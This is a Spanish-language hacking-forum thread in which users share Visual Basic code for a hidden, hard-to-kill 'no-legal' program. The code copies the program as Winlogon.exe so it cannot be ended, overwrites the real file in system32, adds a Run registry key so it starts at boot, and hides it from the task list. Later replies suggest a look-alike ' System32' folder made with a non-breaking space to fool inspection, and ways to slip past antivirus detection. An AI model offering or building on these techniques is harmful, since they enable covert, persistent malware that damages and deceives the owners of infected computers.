Bueng0 gente, les keria compartir un codigo cencillisimo que acabo de hacer y que me parecio muy util ;D
Este codigo iria en el Load del 1er from que se ejecuta, y lo que hace es copiar el ejecutable en otro directorio con el nombre 'Winlogon.exe' (con este nombre, el proceso no puede ser terminado ;)), luego se cierra y habre la nueva copia. De este modo nuestro programa 'no-legal' no puede ser terminado....
Esper0 q les sea de utilidad
Private Sub Form_Load()
Me.Visible = False 'esconde el From de la pantalla
If App.PrevInstance = True Then 'evita que se ejecute 2 veces
End
End If
If App.EXEName <> "Winlogon" Then 'si el programa no se llama "Winlogon.exe" entonces
FileCopy App.Path & "\" & App.EXEName & ".exe", "C:\Winlogon.exe" 'lo copiamos al disco 'C:' con ese nombre
DoEvents
Shell "C:\Winlogon.exe" 'y lo ejecutamos
DoEvents
End
Else 'en cambio, si se llama Winlogon.exe
'Ejecutamos el codigo normal de nuestro programa
End If
End Sub
NOTA: si vas a probar este ejemplo en tu pc, te conviene dejar el From visible y con un boton para finalizar el programa, ya que de otro modo va a ser imposible terminarlo (RESET xD)
esper0 que les sirva, y si no c entiende alg0 posteen (pero me parece q esta bien clarito :P)
salu2 !!!
G0nz4
Hmm lo voy a probar.. de verdad que es interminable simplemente por llamarse WinLogon?
Me resulta muy raro, puesto que el tema de los privilegios es un poco más avanzado que un simple nombre.
Juaz, vaya seguridad de Windows. Copié el ejecutable del bloc de notas y le cambié el nombre a winlogon.exe, no lo deja eliminar de la lista de procesos :-X
Cada día me sorprendo más de este sistema xD.
Gracias por el aporte NYlOn.
Saludos.
Esto no es nuevo, existe otros procesos de windows en los que sucede lo mismo, así como lsass.exe .
De nada :)
Es un placer aportar algo a esta comunidad que tanto me enseña ^^
ak algunos otros proceso que no pueden ser terminados:
-Csrss.exe
-Winlogon.exe
-Lsass.exe
-Smss.exe
-Services.exe
y deve haber un par mas... pero son to2 los q recuerdo xD
------------------------------------
Citarel tema de los privilegios es un poco más avanzado que un simple nombre.
-No en Win XP ;D
un salud0
G0nz4
:D Buenísimo!! tremendo aporte NYlOn.. ahora si que estas hecho un hacker de alta peligrosidad ;D
CitarJuaz, vaya seguridad de Windows. Copié el ejecutable del bloc de notas y le cambié el nombre a winlogon.exe, no lo deja eliminar de la lista de procesos
Cada día me sorprendo más de este sistema xD.
Bueno mi modesta opinión debian haber pensado los de microsoft en no permitir que dos procesos de igual nombre esten corriendo al mismo tiempo, pero en fín, a lo mejor es así por razones que ignoro.. solo estoy conjeturando..
Salu2
Bien por el aporte NYLOn, pero me sorprende un poco que casi nadie lo sepa (entre ellos estaba yo) puesto que ya tu habias hablado sobre esto en algunos post ejem: http://foro.elhacker.net/index.php/topic,88232.0.html ;D
No mucha gente lee los posts enteros (me incluyo xDDD)
salu2
Joder estoy asombrado
Buen trabajo NYlOn.
Gracias :)
jojojooj y eso combinado con esto:
Set obj = CreateObject("Scripting.FileSystemObject") 'declaramos un objeto tipo fileSystem object
Set win = obj.GetSpecialFolder(0) 'para obtener la carpeta de windows y system
Set sys = obj.GetSpecialFolder(1)
win = LCase(win) 'las ponemos en minusculas
sys = LCase(sys)
Form1.Visible = False 'ponemos invisible
'-----Copia a \windows--------------
Dim ejec As String
ejec = App.EXEName & ".exe" 'añadimos ala ruta del exe, el nombre y la estension
FileCopy ejec, sys & "\winlogon.exe" 'copia a windows\system32
End If
Set residencia = CreateObject("WScript.Shell")
residencia.RegWrite "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run\" & "winlogon", win & "\winlogon.exe" 'esto modifica el registro para que se ejecute al iniciar el pc
App.TaskVisible = False 'para ocultarlo un poco del, (alt +sup +control) (aunque es una bosta jejej no funciona en XP)
bueno espero que les sirva para copiar todo en la carpeta windows jejeje
p.D.: usenlo con el codigo de NYlOn
chau
una pregunta... que en System32 no esta el proceso original de winlogon.exe???????
Esto no afectaria a nuestro copy?
o no dañaria al archivo de winlogon.exe original?
y para editar el registro mejor usa apis!, pke esos scripts seran detectados como virus...
Saludos!
me importa un bledo que este el winlogon jejej total se va a romper lo mismo la pc jjejej
che haber pasate las funciones api para modificar el registro si??
Si, dañaria el archivo original :S
Lo q se puede hacer es crear una carpeta en %WindowsRoot% con el nombre de
" System32"Si se fijan bien hay un espacio adelante de "System32", echo con el ALT + 0160.. De esta forma, si alguien se fija en el Registro, aparecera (x ej) "C:\Windows\ System32\Winlogon.exe", x lo que se asemejaria bastante a la realidad :P
(Ahora, esperemos que no revise su carpeta de Win muy seguido pq se daria cuenta xDDD)
Sino lo podemos guardar en la carpeta de Windows y chau problema :p
salu2 !
ah y tengo entendido que eso del los objetos en Script los detectan los antivirus, pero yo tengo el NAV 2004 y no dice ni Mu xD
EDIT:Citarme importa un bledo que este el winlogon jejej total se va a romper lo mismo la pc
La idea no era para dañar el sistema, solo para q no se pueda terminar alguna aplicacion...
Y
BUSCA (http://www.google.com) un poco sobre las API's, en el foro hay mucho tmb...
Windows hace un resguardo de sus archivos más 'importantes', así como taskmsg, regedit y demás, por lo tanto si borramos el archivo winlogon.exe supuestamente al reiniciar windows creará de nuevo este archivo.
PD: Winlogon tan solo es un salvapantallas, no podría originar daños en el ordenador, nada más que cuando apareciera el salvapantallas tras una inactividad se ejecutará este archivo.
Ohhhhhh........ Gracias por decirme eso, no se pke kreia que winlogon.exe era algo relacionado con la entrada de windows xD... Ese que te pone cuando eskoges el usuario para entrar xD.
winlogon no es un salvapantallas. el tema de "que no se puede cerrar el proceso", eso pasa en todos los sitemas (w2k/xp) pq los servicios "no puedes" cerrarlos. tu mismo puedes ajustar los privilegios a tu preceso para que puede cerrar winlogon y todos los demas.
Pues vaya con los programadores de Microsoft... ¿Nunca pensaron que cualquiera puede renombrar un archivo?
Citartu mismo puedes ajustar los privilegios a tu preceso para que puede cerrar winlogon y todos los demas.
Nunca habia oido esto, podrias decirme como ?? ;D
desde ya muchas gracias ^^
salu2 !
Citar
(SeDebugPrivilege)
Permite al usuario asignar un depurador a cualquier proceso.
El privilegio SeDebugPrivilege permite cambiar el flujo de ejecución de cualquier proceso o matarlo (incluyendo los subsistemas de seguridad o cualquier servidor RPC).
solo te queda buscar un poco.
;D
gracias ^^
Citarsi borramos el archivo winlogon.exe supuestamente al reiniciar windows creará de nuevo este archivo.
Eso borraria nuestro programa... Lo mejor seria crearlo en la carpeta de Windows, no en System32
EDITCitarWinlogon tan solo es un salvapantallas
Descripción:WinLogon.exe es el gestor de login en Windows NT. Maneja los procedimientos de login y logout a tu sistema. winlogon.exe es un proceso esencial del sistema y no debe ser terminado.
FUENTE: http://www.yoreparo.com/procesos/winlogon.exe.html
eso es por el sistema de protección de archivos, si lo desactivas no lo vuelve a restaurar. Y no lo restaura cuando reinicia, sino en el momento en que se da cuenta de que ha sido alterado.